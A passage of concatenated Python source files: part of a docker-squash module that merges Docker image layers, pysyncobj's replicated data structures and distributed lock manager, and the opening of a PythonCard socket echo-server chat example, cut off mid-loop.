"Cannot squash %s layers, the %s image contains only %s layers" % (number_of_layers, self.image, len(self.old_image_layers)))
def _before_squashing(self):
self._initialize_directories()
# Location of the tar archive with squashed layers
self.squashed_tar = os.path.join(self.squashed_dir, "layer.tar")
if self.tag:
self.image_name, self.image_tag = self._parse_image_name(self.tag)
# The image id or name of the image to be squashed
try:
self.old_image_id = self.docker.inspect_image(self.image)['Id']
except SquashError:
raise SquashError(
"Could not get the image ID to squash, please check provided 'image' argument: %s" % self.image)
self.old_image_layers = []
# Read all layers in the image
self._read_layers(self.old_image_layers, self.old_image_id)
self.old_image_layers.reverse()
self.log.info("Old image has %s layers", len(self.old_image_layers))
self.log.debug("Old layers: %s", self.old_image_layers)
# By default - squash all layers.
if self.from_layer == None:
self.from_layer = len(self.old_image_layers)
try:
number_of_layers = int(self.from_layer)
self.log.debug(
"We detected number of layers as the argument to squash")
except ValueError:
self.log.debug("We detected layer as the argument to squash")
squash_id = self._squash_id(self.from_layer)
if not squash_id:
raise SquashError(
"The %s layer could not be found in the %s image" % (self.from_layer, self.image))
number_of_layers = len(self.old_image_layers) - \
self.old_image_layers.index(squash_id) - 1
self._validate_number_of_layers(number_of_layers)
marker = len(self.old_image_layers) - number_of_layers
self.layers_to_squash = self.old_image_layers[marker:]
self.layers_to_move = self.old_image_layers[:marker]
self.log.info("Checking if squashing is necessary...")
if len(self.layers_to_squash) < 1:
raise SquashError(
"Invalid number of layers to squash: %s" % len(self.layers_to_squash))
if len(self.layers_to_squash) == 1:
raise SquashUnnecessaryError(
"Single layer marked to squash, no squashing is required")
self.log.info("Attempting to squash last %s layers...",
number_of_layers)
self.log.debug("Layers to squash: %s", self.layers_to_squash)
self.log.debug("Layers to move: %s", self.layers_to_move)
# Fetch the image and unpack it on the fly to the old image directory
self._save_image(self.old_image_id, self.old_image_dir)
self.size_before = self._dir_size(self.old_image_dir)
self.log.info("Squashing image '%s'..." % self.image)
def _after_squashing(self):
self.log.debug("Removing from disk already squashed layers...")
shutil.rmtree(self.old_image_dir, ignore_errors=True)
self.size_after = self._dir_size(self.new_image_dir)
size_before_mb = float(self.size_before)/1024/1024
size_after_mb = float(self.size_after)/1024/1024
self.log.info("Original image size: %.2f MB" % size_before_mb)
self.log.info("Squashed image size: %.2f MB" % size_after_mb)
if (size_after_mb >= size_before_mb):
self.log.info("If the squashed image is larger than original it means that there were no meaningful files to squash and it just added metadata. Are you sure you specified correct parameters?")
else:
self.log.info("Image size decreased by %.2f %%" % float(
((size_before_mb-size_after_mb)/size_before_mb)*100))
def _dir_size(self, directory):
size = 0
for path, dirs, files in os.walk(directory):
for f in files:
size += os.path.getsize(os.path.join(path, f))
return size
def layer_paths(self):
"""
Returns name of directories to layers in the exported tar archive.
"""
pass
def export_tar_archive(self, target_tar_file):
self._tar_image(target_tar_file, self.new_image_dir)
self.log.info("Image available at '%s'" % target_tar_file)
def load_squashed_image(self):
self._load_image(self.new_image_dir)
if self.tag:
self.log.info("Image registered in Docker daemon as %s:%s" %
(self.image_name, self.image_tag))
def _files_in_layers(self, layers, directory):
"""
Prepare a list of files in all layers
"""
files = {}
for layer in layers:
self.log.debug("Generating list of files in layer '%s'..." % layer)
tar_file = os.path.join(directory, layer, "layer.tar")
with tarfile.open(tar_file, 'r', format=tarfile.PAX_FORMAT) as tar:
files[layer] = [self._normalize_path(
x) for x in tar.getnames()]
self.log.debug("Done, found %s files" % len(files[layer]))
return files
def _prepare_tmp_directory(self, tmp_dir):
""" Creates temporary directory that is used to work on layers """
if tmp_dir:
if os.path.exists(tmp_dir):
raise SquashError(
"The '%s' directory already exists, please remove it before you proceed" % tmp_dir)
os.makedirs(tmp_dir)
else:
tmp_dir = tempfile.mkdtemp(prefix="docker-squash-")
self.log.debug("Using %s as the temporary directory" % tmp_dir)
return tmp_dir
def _load_image(self, directory):
tar_file = os.path.join(self.tmp_dir, "image.tar")
self._tar_image(tar_file, directory)
with open(tar_file, 'rb') as f:
self.log.debug("Loading squashed image...")
self.docker.load_image(f)
self.log.debug("Image loaded!")
os.remove(tar_file)
def _tar_image(self, target_tar_file, directory):
with tarfile.open(target_tar_file, 'w', format=tarfile.PAX_FORMAT) as tar:
self.log.debug("Generating tar archive for the squashed image...")
with Chdir(directory):
# docker produces images like this:
# repositories
# <layer>/json
# and not:
# ./
# ./repositories
# ./<layer>/json
for f in os.listdir("."):
tar.add(f)
self.log.debug("Archive generated")
def _layers_to_squash(self, layers, from_layer):
""" Prepares a list of layer IDs that should be squashed """
to_squash = []
to_leave = []
should_squash = True
for l in reversed(layers):
if l == from_layer:
should_squash = False
if should_squash:
to_squash.append(l)
else:
to_leave.append(l)
to_squash.reverse()
to_leave.reverse()
return to_squash, to_leave
def _extract_tar(self, fileobj, directory):
with tarfile.open(fileobj=fileobj, mode='r|') as tar:
tar.extractall(path=directory)
def _save_image(self, image_id, directory):
""" Saves the image as a tar archive under specified name """
for x in [0, 1, 2]:
self.log.info("Saving image %s to %s directory..." %
(image_id, directory))
self.log.debug("Try #%s..." % (x + 1))
try:
image = self.docker.get_image(image_id)
if docker.version_info[0] < 3:
# Docker library prior to 3.0.0 returned the requests
# object directly which cold be used to read from
self.log.debug(
"Extracting image using HTTPResponse object directly")
self._extract_tar(image, directory)
else:
# Docker library >=3.0.0 returns iterator over raw data
self.log.debug(
"Extracting image using iterator over raw data")
fd_r, fd_w = os.pipe()
r = os.fdopen(fd_r, 'rb')
w = os.fdopen(fd_w, 'wb')
extracter = threading.Thread(
target=self._extract_tar, args=(r, directory))
extracter.start()
for chunk in image:
w.write(chunk)
w.flush()
w.close()
extracter.join()
r.close()
self.log.info("Image saved!")
return True
except Exception as e:
self.log.exception(e)
self.log.warning(
"An error occured while saving the %s image, retrying..." % image_id)
raise SquashError("Couldn't save %s image!" % image_id)
def _unpack(self, tar_file, directory):
""" Unpacks tar archive to selected directory """
self.log.info("Unpacking %s tar file to %s directory" %
(tar_file, directory))
with tarfile.open(tar_file, 'r') as tar:
tar.extractall(path=directory)
self.log.info("Archive unpacked!")
def _read_layers(self, layers, image_id):
""" Reads the JSON metadata for specified layer / image id """
for layer in self.docker.history(image_id):
layers.append(layer['Id'])
def _parse_image_name(self, image):
"""
Parses the provided image name and splits it in the
name and tag part, if possible. If no tag is provided
'latest' is used.
"""
if ':' in image and '/' not in image.split(':')[-1]:
image_tag = image.split(':')[-1]
image_name = image[:-(len(image_tag) + 1)]
else:
image_tag = "latest"
image_name = image
return (image_name, image_tag)
def _dump_json(self, data, new_line=False):
"""
Helper function to marshal object into JSON string.
Additionally a sha256sum of the created JSON string is generated.
"""
# We do not want any spaces between keys and values in JSON
json_data = json.dumps(data, separators=(',', ':'))
if new_line:
json_data = "%s\n" % json_data
# Generate sha256sum of the JSON data, may be handy
sha = hashlib.sha256(json_data.encode('utf-8')).hexdigest()
return json_data, sha
def _generate_repositories_json(self, repositories_file, image_id, name, tag):
if not image_id:
raise SquashError("Provided image id cannot be null")
if name == tag == None:
self.log.debug(
"No name and tag provided for the image, skipping generating repositories file")
return
repos = {}
repos[name] = {}
repos[name][tag] = image_id
data = json.dumps(repos, separators=(',', ':'))
with open(repositories_file, 'w') as f:
f.write(data)
f.write("\n")
def _write_version_file(self, squashed_dir):
version_file = os.path.join(squashed_dir, "VERSION")
with open(version_file, 'w') as f:
f.write("1.0")
def _write_json_metadata(self, metadata, metadata_file):
with open(metadata_file, 'w') as f:
f.write(metadata)
def _read_old_metadata(self, old_json_file):
self.log.debug("Reading JSON metadata file '%s'..." % old_json_file)
# Read original metadata
with open(old_json_file, 'r') as f:
metadata = json.load(f)
return metadata
def _move_layers(self, layers, src, dest):
"""
This moves all the layers that should be copied as-is.
In other words - all layers that are not meant to be squashed will be
moved from the old image to the new image untouched.
"""
for layer in layers:
layer_id = layer.replace('sha256:', '')
self.log.debug("Moving unmodified layer '%s'..." % layer_id)
shutil.move(os.path.join(src, layer_id), dest)
def _file_should_be_skipped(self, file_name, file_paths):
# file_paths is now array of array with files to be skipped.
# First level are layers, second are files in these layers.
layer_nb = 1
for layers in file_paths:
for file_path in layers:
if file_name == file_path or file_name.startswith(file_path + "/"):
return layer_nb
layer_nb += 1
return 0
def _marker_files(self, tar, members):
"""
Searches for marker files in the specified archive.
Docker marker files are files taht have the .wh. prefix in the name.
These files mark the corresponding file to be removed (hidden) when
we start a container from the image.
"""
marker_files = {}
self.log.debug(
"Searching for marker files in '%s' archive..." % tar.name)
for member in members:
if '.wh.' in member.name:
self.log.debug("Found '%s' marker file" % member.name)
marker_files[member] = tar.extractfile(member)
self.log.debug("Done, found %s files" % len(marker_files))
return marker_files
def _add_markers(self, markers, tar, files_in_layers, added_symlinks):
"""
This method is responsible for adding back all markers that were not
added to the squashed layer AND files they refer to can be found in layers
we do not squash.
"""
if markers:
self.log.debug("Marker files to add: %s" %
[o.name for o in markers.keys()])
else:
# No marker files to add
return
# https://github.com/goldmann/docker-squash/issues/108
# Some tar archives do have the filenames prefixed with './'
# which does not have any effect when we unpack the tar achive,
# but when processing tar content - we see this.
tar_files = [self._normalize_path(x) for x in tar.getnames()]
for marker, marker_file in six.iteritems(markers):
actual_file = marker.name.replace('.wh.', '')
normalized_file = self._normalize_path(actual_file)
should_be_added_back = False
if self._file_should_be_skipped(normalized_file, added_symlinks):
self.log.debug(
"Skipping '%s' marker file, this file is on a symlink path" % normalized_file)
continue
if normalized_file in tar_files:
self.log.debug(
"Skipping '%s' marker file, this file was added earlier for some reason..." % normalized_file)
continue
if files_in_layers:
for files in files_in_layers.values():
if normalized_file in files:
should_be_added_back = True
break
else:
# There are no previous layers, so we need to add it back
# In fact this shouldn't happen since having a marker file
# where there is no previous layer does not make sense.
should_be_added_back = True
if should_be_added_back:
self.log.debug(
"Adding '%s' marker file back..." % marker.name)
# Marker files on AUFS are hardlinks, we need to create
# regular files, therefore we need to recreate the tarinfo
# object
tar.addfile(tarfile.TarInfo(name=marker.name), marker_file)
# Add the file name to the list too to avoid re-reading all files
# in tar archive
tar_files.append(normalized_file)
else:
self.log.debug(
"Skipping '%s' marker file..." % marker.name)
def _normalize_path(self, path):
return os.path.normpath(os.path.join("/", path))
def _add_hardlinks(self, squashed_tar, squashed_files, to_skip, skipped_hard_links):
for layer, hardlinks_in_layer in enumerate(skipped_hard_links):
# We need to start from 1, that's why we bump it here
current_layer = layer + 1
for member in six.itervalues(hardlinks_in_layer):
normalized_name = self._normalize_path(member.name)
normalized_linkname = self._normalize_path(member.linkname)
# Find out if the name is on the list of files to skip - if it is - get the layer number
# where it was found
layer_skip_name = self._file_should_be_skipped(
normalized_name, to_skip)
# Do the same for linkname
layer_skip_linkname = self._file_should_be_skipped(
normalized_linkname, to_skip)
# We need to check if we should skip adding back the hard link
# This can happen in the following situations:
# 1. hard link is on the list of files to skip
# 2. hard link target is on the list of files to skip
# 3. hard link is already in squashed files
# 4. hard link target is NOT in already squashed files
if layer_skip_name and current_layer > layer_skip_name or layer_skip_linkname and current_layer > layer_skip_linkname or normalized_name in squashed_files or normalized_linkname not in squashed_files:
self.log.debug("Found a hard link '%s' to a file which is marked to be skipped: '%s', skipping link too" % (
normalized_name, normalized_linkname))
else:
if self.debug:
self.log.debug("Adding hard link '%s' pointing to '%s' back..." % (
normalized_name, normalized_linkname))
squashed_files.append(normalized_name)
squashed_tar.addfile(member)
def _add_file(self, member, content, squashed_tar, squashed_files, to_skip):
normalized_name = self._normalize_path(member.name)
if normalized_name in squashed_files:
self.log.debug(
"Skipping file '%s' because it is already squashed" % normalized_name)
return
if self._file_should_be_skipped(normalized_name, to_skip):
self.log.debug(
"Skipping '%s' file because it's on the list to skip files" % normalized_name)
return
if content:
squashed_tar.addfile(member, content)
else:
# Special case: other(?) files, we skip the file
# itself
squashed_tar.addfile(member)
# We added a file to the squashed tar, so let's note it
squashed_files.append(normalized_name)
def _add_symlinks(self, squashed_tar, squashed_files, to_skip, skipped_sym_links):
added_symlinks = []
for layer, symlinks_in_layer in enumerate(skipped_sym_links):
# We need to start from 1, that's why we bump it here
current_layer = layer + 1
for member in six.itervalues(symlinks_in_layer):
# Handling symlinks. This is similar to hard links with one
# difference. Sometimes we do want to have broken symlinks
# be addedeither case because these can point to locations
# that will become avaialble after adding volumes for example.
normalized_name = self._normalize_path(member.name)
normalized_linkname = self._normalize_path(member.linkname)
# File is already in squashed files, skipping
if normalized_name in squashed_files:
self.log.debug(
"Found a symbolic link '%s' which is already squashed, skipping" % (normalized_name))
continue
if self._file_should_be_skipped(normalized_name, added_symlinks):
self.log.debug(
"Found a symbolic link '%s' which is on a path to previously squashed symlink, skipping" % (normalized_name))
continue
# Find out if the name is on the list of files to skip - if it is - get the layer number
# where it was found
layer_skip_name = self._file_should_be_skipped(
normalized_name, to_skip)
# Do the same for linkname
layer_skip_linkname = self._file_should_be_skipped(
normalized_linkname, to_skip)
# If name or linkname was found in the lists of files to be
# skipped or it's not found in the squashed files
if layer_skip_name and current_layer > layer_skip_name or layer_skip_linkname and current_layer > layer_skip_linkname:
self.log.debug("Found a symbolic link '%s' to a file which is marked to be skipped: '%s', skipping link too" % (
normalized_name, normalized_linkname))
else:
if self.debug:
self.log.debug("Adding symbolic link '%s' pointing to '%s' back..." % (
normalized_name, normalized_linkname))
added_symlinks.append([normalized_name])
squashed_files.append(normalized_name)
squashed_tar.addfile(member)
return added_symlinks
def _squash_layers(self, layers_to_squash, layers_to_move):
self.log.info("Starting squashing...")
# Reverse the layers to squash - we begin with the newest one
# to make the tar lighter
layers_to_squash.reverse()
# Find all files in layers that we don't squash
files_in_layers_to_move = self._files_in_layers(
layers_to_move, self.old_image_dir)
with tarfile.open(self.squashed_tar, 'w', format=tarfile.PAX_FORMAT) as squashed_tar:
to_skip = []
skipped_markers = {}
skipped_hard_links = []
skipped_sym_links = []
skipped_files = []
# List of filenames in the squashed archive
squashed_files = []
# List of opaque directories in the image
opaque_dirs = []
for layer_id in layers_to_squash:
layer_tar_file = os.path.join(
self.old_image_dir, layer_id, "layer.tar")
self.log.info("Squashing file '%s'..." % layer_tar_file)
# Open the exiting layer to squash
with tarfile.open(layer_tar_file, 'r', format=tarfile.PAX_FORMAT) as layer_tar:
# Find all marker files for all layers
# We need the list of marker files upfront, so we can
# skip unnecessary files
members = layer_tar.getmembers()
markers = self._marker_files(layer_tar, members)
skipped_sym_link_files = {}
skipped_hard_link_files = {}
skipped_files_in_layer = {}
files_to_skip = []
# List of opaque directories found in this layer
layer_opaque_dirs = []
# Add it as early as possible, we will be populating
# 'skipped_sym_link_files' array later
skipped_sym_links.append(skipped_sym_link_files)
# Add it as early as possible, we will be populating
# 'files_to_skip' array later
to_skip.append(files_to_skip)
# Iterate over marker files found for this particular
# layer and if a file in the squashed layers file corresponding
# to the marker file is found, then skip both files
for marker, marker_file in six.iteritems(markers):
# We have a opaque directory marker file
# https://github.com/opencontainers/image-spec/blob/master/layer.md#opaque-whiteout
if marker.name.endswith('.wh..wh..opq'):
opaque_dir = os.path.dirname(marker.name)
self.log.debug(
"Found opaque directory: '%s'" % opaque_dir)
layer_opaque_dirs.append(opaque_dir)
else:
files_to_skip.append(
self._normalize_path(marker.name.replace('.wh.', '')))
skipped_markers[marker] = marker_file
# Copy all the files to the new tar
for member in members:
normalized_name = self._normalize_path(member.name)
if self._is_in_opaque_dir(member, opaque_dirs):
self.log.debug(
"Skipping file '%s' because it is in an opaque directory" % normalized_name)
continue
# Skip all symlinks, we'll investigate them later
if member.issym():
skipped_sym_link_files[normalized_name] = member
continue
if member in six.iterkeys(skipped_markers):
self.log.debug(
"Skipping '%s' marker file, at the end of squashing we'll see if it's necessary to add it back" % normalized_name)
continue
if self._file_should_be_skipped(normalized_name, skipped_sym_links):
self.log.debug(
"Skipping '%s' file because it's on a symlink path, at the end of squashing we'll see if it's necessary to add it back" % normalized_name)
if member.isfile():
f = (member, layer_tar.extractfile(member))
else:
f = (member, None)
skipped_files_in_layer[normalized_name] = f
continue
# Skip files that are marked to be skipped
if self._file_should_be_skipped(normalized_name, to_skip):
self.log.debug(
"Skipping '%s' file because it's on the list to skip files" % normalized_name)
continue
# Check if file is already added to the archive
if normalized_name in squashed_files:
# File already exist in the squashed archive, skip it because
# file want to add is older than the one already in the archive.
# This is true because we do reverse squashing - from
# newer to older layer
self.log.debug(
"Skipping '%s' file because it's older than file already added to the archive" % normalized_name)
continue
# Hard links are processed after everything else
if member.islnk():
skipped_hard_link_files[normalized_name] = member
continue
content = None
if member.isfile():
content = layer_tar.extractfile(member)
self._add_file(member, content,
squashed_tar, squashed_files, to_skip)
skipped_hard_links.append(skipped_hard_link_files)
skipped_files.append(skipped_files_in_layer)
opaque_dirs += layer_opaque_dirs
self._add_hardlinks(squashed_tar, squashed_files,
to_skip, skipped_hard_links)
added_symlinks = self._add_symlinks(
squashed_tar, squashed_files, to_skip, skipped_sym_links)
for layer in skipped_files:
for member, content in six.itervalues(layer):
self._add_file(member, content, squashed_tar,
squashed_files, added_symlinks)
if files_in_layers_to_move:
self._reduce(skipped_markers)
self._add_markers(skipped_markers, squashed_tar,
files_in_layers_to_move, added_symlinks)
self.log.info("Squashing finished!")
def _is_in_opaque_dir(self, member, dirs):
"""
If the member we investigate is an opaque directory
or if the member is located inside of the opaque directory,
we copy these files as-is. Any other layer that has content
on the opaque directory will be ignored!
"""
for opaque_dir in dirs:
if member.name == opaque_dir or member.name.startswith("%s/" % opaque_dir):
self.log.debug("Member '%s' found to be part of opaque directory '%s'" % (
member.name, opaque_dir))
return True
return False
def _reduce(self, markers):
"""
This function is responsible for reducing marker files
that are scheduled to be added at the end of squashing to
minimum.
In some cases, one marker file will overlap
with others making others not necessary.
This is not only about adding less marker files, but
if we try to add a marker file for a file or directory
deeper in the hierarchy of already marked directory,
the image will not be successfully loaded back into Docker
daemon.
Passed dictionary containing markers is altered *in-place*.
Args:
markers (dict): Dictionary of markers scheduled to be added.
"""
self.log.debug("Reducing marker files to be added back...")
# Prepare a list of files (or directories) based on the marker
# files scheduled to be added
marked_files = list(map(lambda x: self._normalize_path(
x.name.replace('.wh.', '')), markers.keys()))
# List of markers that should be not added back to tar file
to_remove = []
for marker in markers.keys():
self.log.debug(
"Investigating '{}' marker file".format(marker.name))
path = self._normalize_path(marker.name.replace('.wh.', ''))
# Iterate over the path hierarchy, but starting with the
# root directory. This will make it possible to remove
# marker files based on the highest possible directory level
for directory in reversed(self._path_hierarchy(path)):
if directory in marked_files:
self.log.debug(
"Marker file '{}' is superseded by higher-level marker file: '{}'".format(marker.name, directory))
to_remove.append(marker)
break
self.log.debug("Removing {} marker files".format(len(to_remove)))
if to_remove:
for marker in to_remove:
self.log.debug("Removing '{}' marker file".format(marker.name))
markers.pop(marker)
self.log.debug("Marker files reduced")
def _path_hierarchy(self, path):
"""
Creates a full hierarchy of directories for a given path.
For a particular path, a list will be returned
containing paths from the path specified, through all levels
up to the root directory.
Example:
Path '/opt/testing/some/dir/structure/file'
will return:
['/opt/testing/some/dir/structure', '/opt/testing/some/dir', '/opt/testing/some', '/opt/testing', '/opt', '/']
"""
if not path:
raise SquashError("No path provided to create the hierarchy for")
hierarchy = []
dirname = os.path.dirname(path)
hierarchy.append(dirname)
# If we are already at root level, stop
if dirname != '/':
hierarchy.extend(self._path_hierarchy(dirname))
return hierarchy
|
batteries.py
|
import threading
import weakref
import time
import socket
import os
import collections
import heapq
from .syncobj import SyncObjConsumer, replicated
class ReplCounter(SyncObjConsumer):
def __init__(self):
"""
Simple distributed counter. You can set, add, sub and inc counter value.
"""
super(ReplCounter, self).__init__()
self.__counter = int()
@replicated
def set(self, newValue):
"""
Set new value to a counter.
:param newValue: new value
:return: new counter value
"""
self.__counter = newValue
return self.__counter
@replicated
def add(self, value):
"""
Adds value to a counter.
:param value: value to add
:return: new counter value
"""
self.__counter += value
return self.__counter
@replicated
def sub(self, value):
"""
Subtracts a value from counter.
:param value: value to subtract
:return: new counter value
"""
self.__counter -= value
return self.__counter
@replicated
def inc(self):
"""
Increments counter value by one.
:return: new counter value
"""
self.__counter += 1
return self.__counter
def get(self):
"""
:return: current counter value
"""
return self.__counter
class ReplList(SyncObjConsumer):
def __init__(self):
"""
Distributed list - it has an interface similar to a regular list.
"""
super(ReplList, self).__init__()
self.__data = []
@replicated
def reset(self, newData):
"""Replace list with a new one"""
assert isinstance(newData, list)
self.__data = newData
@replicated
def set(self, position, newValue):
"""Update value at given position."""
self.__data[position] = newValue
@replicated
def append(self, item):
"""Append item to end"""
self.__data.append(item)
@replicated
def extend(self, other):
"""Extend list by appending elements from the iterable"""
self.__data.extend(other)
@replicated
def insert(self, position, element):
"""Insert object before position"""
self.__data.insert(position, element)
@replicated
def remove(self, element):
"""
Remove first occurrence of element.
Raises ValueError if the value is not present.
"""
self.__data.remove(element)
@replicated
def pop(self, position=None):
"""
Remove and return item at position (default last).
Raises IndexError if list is empty or index is out of range.
"""
return self.__data.pop(position)
@replicated
def sort(self, reverse=False):
"""Stable sort *IN PLACE*"""
self.__data.sort(reverse=reverse)
def index(self, element):
"""
Return first position of element.
Raises ValueError if the value is not present.
"""
return self.__data.index(element)
def count(self, element):
""" Return number of occurrences of element """
return self.__data.count(element)
def get(self, position):
""" Return value at given position"""
return self.__data[position]
def __getitem__(self, position):
""" Return value at given position"""
return self.__data[position]
@replicated(ver=1)
def __setitem__(self, position, element):
"""Update value at given position."""
self.__data[position] = element
def __len__(self):
"""Return the number of items of a sequence or collection."""
return len(self.__data)
def rawData(self):
"""Return internal list - use it carefully"""
return self.__data
class ReplDict(SyncObjConsumer):
def __init__(self):
"""
Distributed dict - it has an interface similar to a regular dict.
"""
super(ReplDict, self).__init__()
self.__data = {}
@replicated
def reset(self, newData):
"""Replace dict with a new one"""
assert isinstance(newData, dict)
self.__data = newData
@replicated
def __setitem__(self, key, value):
"""Set value for specified key"""
self.__data[key] = value
@replicated
def set(self, key, value):
"""Set value for specified key"""
self.__data[key] = value
@replicated
def setdefault(self, key, default):
"""Return value for specified key, set default value if key not exist"""
return self.__data.setdefault(key, default)
@replicated
def update(self, other):
"""Adds all values from the other dict"""
self.__data.update(other)
@replicated
def pop(self, key, default=None):
"""Remove and return value for given key, return default if key not exist"""
return self.__data.pop(key, default)
@replicated
def clear(self):
"""Remove all items from dict"""
self.__data.clear()
def __getitem__(self, key):
"""Return value for given key"""
return self.__data[key]
def get(self, key, default=None):
"""Return value for given key, return default if key not exist"""
return self.__data.get(key, default)
def __len__(self):
"""Return size of dict"""
return len(self.__data)
def __contains__(self, key):
"""True if key exists"""
return key in self.__data
def keys(self):
"""Return all keys"""
return self.__data.keys()
def values(self):
"""Return all values"""
return self.__data.values()
def items(self):
"""Return all items"""
return self.__data.items()
def rawData(self):
"""Return internal dict - use it carefully"""
return self.__data
class ReplSet(SyncObjConsumer):
def __init__(self):
"""
Distributed set - it has an interface similar to a regular set.
"""
super(ReplSet, self).__init__()
self.__data = set()
@replicated
def reset(self, newData):
"""Replace set with a new one"""
assert isinstance(newData, set)
self.__data = newData
@replicated
def add(self, item):
"""Add an element to a set"""
self.__data.add(item)
@replicated
def remove(self, item):
"""
Remove an element from a set; it must be a member.
If the element is not a member, raise a KeyError.
"""
self.__data.remove(item)
@replicated
def discard(self, item):
"""
Remove an element from a set if it is a member.
If the element is not a member, do nothing.
"""
self.__data.discard(item)
@replicated
def pop(self):
"""
Remove and return an arbitrary set element.
Raises KeyError if the set is empty.
"""
return self.__data.pop()
@replicated
def clear(self):
""" Remove all elements from this set. """
self.__data.clear()
@replicated
def update(self, other):
""" Update a set with the union of itself and others. """
self.__data.update(other)
def rawData(self):
"""Return internal dict - use it carefully"""
return self.__data
def __len__(self):
"""Return size of set"""
return len(self.__data)
def __contains__(self, item):
"""True if item exists"""
return item in self.__data
class ReplQueue(SyncObjConsumer):
def __init__(self, maxsize=0):
"""
Replicated FIFO queue. Based on collections.deque.
Has an interface similar to Queue.
:param maxsize: Max queue size.
:type maxsize: int
"""
super(ReplQueue, self).__init__()
self.__maxsize = maxsize
self.__data = collections.deque()
def qsize(self):
"""Return size of queue"""
return len(self.__data)
def empty(self):
"""True if queue is empty"""
return len(self.__data) == 0
def __len__(self):
"""Return size of queue"""
return len(self.__data)
def full(self):
"""True if queue is full"""
return len(self.__data) == self.__maxsize
@replicated
def put(self, item):
"""Put an item into the queue.
True - if item placed in queue.
False - if queue is full and item can not be placed."""
if self.__maxsize and len(self.__data) >= self.__maxsize:
return False
self.__data.append(item)
return True
@replicated
def get(self, default=None):
"""Extract item from queue.
Return default if queue is empty."""
try:
return self.__data.popleft()
except:
return default
class ReplPriorityQueue(SyncObjConsumer):
def __init__(self, maxsize=0):
"""
Replicated priority queue. Based on heapq.
Has an interface similar to Queue.
:param maxsize: Max queue size.
:type maxsize: int
"""
super(ReplPriorityQueue, self).__init__()
self.__maxsize = maxsize
self.__data = []
def qsize(self):
"""Return size of queue"""
return len(self.__data)
def empty(self):
"""True if queue is empty"""
return len(self.__data) == 0
def __len__(self):
"""Return size of queue"""
return len(self.__data)
def full(self):
"""True if queue is full"""
return len(self.__data) == self.__maxsize
@replicated
def put(self, item):
"""Put an item into the queue. Items should be comparable, eg. tuples.
True - if item placed in queue.
False - if queue is full and item can not be placed."""
if self.__maxsize and len(self.__data) >= self.__maxsize:
return False
heapq.heappush(self.__data, item)
return True
@replicated
def get(self, default=None):
"""Extract the smallest item from queue.
Return default if queue is empty."""
if not self.__data:
return default
return heapq.heappop(self.__data)
class _ReplLockManagerImpl(SyncObjConsumer):
def __init__(self, autoUnlockTime):
super(_ReplLockManagerImpl, self).__init__()
self.__locks = {}
self.__autoUnlockTime = autoUnlockTime
@replicated
def acquire(self, lockID, clientID, currentTime):
existingLock = self.__locks.get(lockID, None)
# Auto-unlock old lock
if existingLock is not None:
if currentTime - existingLock[1] > self.__autoUnlockTime:
existingLock = None
# Acquire lock if possible
if existingLock is None or existingLock[0] == clientID:
self.__locks[lockID] = (clientID, currentTime)
return True
# Lock already acquired by someone else
return False
@replicated
def prolongate(self, clientID, currentTime):
for lockID in list(self.__locks):
lockClientID, lockTime = self.__locks[lockID]
if currentTime - lockTime > self.__autoUnlockTime:
del self.__locks[lockID]
continue
if lockClientID == clientID:
self.__locks[lockID] = (clientID, currentTime)
@replicated
def release(self, lockID, clientID):
existingLock = self.__locks.get(lockID, None)
if existingLock is not None and existingLock[0] == clientID:
del self.__locks[lockID]
def isAcquired(self, lockID, clientID, currentTime):
existingLock = self.__locks.get(lockID, None)
if existingLock is not None:
if existingLock[0] == clientID:
if currentTime - existingLock[1] < self.__autoUnlockTime:
return True
return False
class ReplLockManager(object):
def __init__(self, autoUnlockTime, selfID = None):
"""Replicated Lock Manager. Allow to acquire / release distributed locks.
:param autoUnlockTime: lock will be released automatically
if no response from holder for more than autoUnlockTime seconds
:type autoUnlockTime: float
:param selfID: (optional) - unique id of current lock holder.
:type selfID: str
"""
self.__lockImpl = _ReplLockManagerImpl(autoUnlockTime)
if selfID is None:
selfID = '%s:%d:%d' % (socket.gethostname(), os.getpid(), id(self))
self.__selfID = selfID
self.__autoUnlockTime = autoUnlockTime
self.__mainThread = threading.current_thread()
self.__initialised = threading.Event()
self.__destroying = False
self.__lastProlongateTime = 0
self.__thread = threading.Thread(target=ReplLockManager._autoAcquireThread, args=(weakref.proxy(self),))
self.__thread.start()
while not self.__initialised.is_set():
pass
def _consumer(self):
return self.__lockImpl
def destroy(self):
"""Destroy should be called before destroying ReplLockManager"""
self.__destroying = True
def _autoAcquireThread(self):
self.__initialised.set()
try:
while True:
if not self.__mainThread.is_alive():
break
if self.__destroying:
break
time.sleep(0.1)
if time.time() - self.__lastProlongateTime < float(self.__autoUnlockTime) / 4.0:
continue
syncObj = self.__lockImpl._syncObj
if syncObj is None:
continue
if syncObj._getLeader() is not None:
self.__lastProlongateTime = time.time()
self.__lockImpl.prolongate(self.__selfID, time.time())
except ReferenceError:
pass
def tryAcquire(self, lockID, callback=None, sync=False, timeout=None):
"""Attempt to acquire lock.
:param lockID: unique lock identifier.
:type lockID: str
:param sync: True - to wait until lock is acquired or failed to acquire.
:type sync: bool
:param callback: if sync is False - callback will be called with operation result.
:type callback: func(opResult, error)
:param timeout: max operation time (default - unlimited)
:type timeout: float
:return True if acquired, False - somebody else already acquired lock
"""
# try to acquire the lock and check if the lock was actually acquired
return self.__lockImpl.acquire(lockID, self.__selfID, time.time(), callback=callback, sync=sync, timeout=timeout) \
and self.__lockImpl.isAcquired(lockID, self.__selfID, time.time())
def isAcquired(self, lockID):
"""Check if lock is acquired by ourselves.
:param lockID: unique lock identifier.
:type lockID: str
:return True if lock is acquired by ourselves.
"""
return self.__lockImpl.isAcquired(lockID, self.__selfID, time.time())
def release(self, lockID, callback=None, sync=False, timeout=None):
"""
Release previously-acquired lock.
:param lockID: unique lock identifier.
:type lockID: str
:param sync: True - to wait until lock is released or failed to release.
:type sync: bool
:param callback: if sync is False - callback will be called with operation result.
:type callback: func(opResult, error)
:param timeout: max operation time (default - unlimited)
:type timeout: float
"""
self.__lockImpl.release(lockID, self.__selfID, callback=callback, sync=sync, timeout=timeout)
|
chat.py
|
#!/usr/bin/python
"""
__version__ = "$Revision: 1.6 $"
__date__ = "$Date: 2004/05/05 16:53:25 $"
"""
from PythonCard import model
import threading
import Queue
import wx
# EchoServer derived
# from echo server example in Programming Python by Mark Lutz
# get socket constructor and constants
import socket
# server machine, '' means local host
myHost = ''
# listen on a non-reserved port number
myPort = 50007
class EchoServer:
def __init__(self, parent):
self._parent = parent
self.keepRunning = 1
def server(self):
# make a TCP socket object
sockobj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# bind it to server port number
sockobj.bind((myHost, myPort))
# listen, allow 5 pending connects
sockobj.listen(5)
# listen until process killed
while self.keepRunning:
